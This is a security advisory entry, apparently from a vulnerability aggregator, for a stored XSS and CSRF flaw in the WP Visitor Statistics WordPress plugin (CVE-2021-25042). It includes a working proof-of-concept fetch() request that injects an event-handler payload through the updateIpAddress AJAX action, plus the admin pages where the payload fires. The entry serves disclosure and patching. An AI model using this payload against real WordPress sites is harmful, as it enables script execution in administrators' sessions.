Lucene search
Krzysztof ZającWPEX-ID:05B9E478-2D3B-4460-88C1-7F81D3A68AC4HistoryJan 31, 2022 - 12:00 a.m.
WP Visitor Statistics (Real Time Traffic) < 5.5 - Arbitrary IP Address Exclusion to Stored XSS
2022-01-3100:00:00
Krzysztof Zając
244
wordpress
visitor statistics
xss
ip address
vulnerability
admin
EPSS
0.001
Percentile
24.8%
The plugin does not have authorisation and CSRF checks in the updateIpAddress AJAX action, allowing any authenticated user to call it, or make a logged in user do it via a CSRF attack and add an arbitrary IP address to exclude. Furthermore, due to the lack of validation, sanitisation and escaping, users could set a malicious value and perform Cross-Site Scripting attacks against logged in admin
As any logged-in user:
fetch("http://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"updateIpAddress","ip":'" style=animation-name:rotation onanimationstart=alert(1) x'}),
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data));
Then (as admin) browse to https://example.com/wp-admin/admin.php?page=wsm_settings#ipexclusion or https://example.com/wp-admin/admin.php?page=wsm_ipexcRelated
prion
prion
Cross site scripting
2022-02-28 09:15:00
cnvd
cnvd
wpvulndb
wpvulndb
nvd
nvd
CVE-2021-25042
2022-02-28 09:15:08
patchstack
patchstack
cve
cve
CVE-2021-25042
2022-02-28 09:15:08
cvelist
cvelist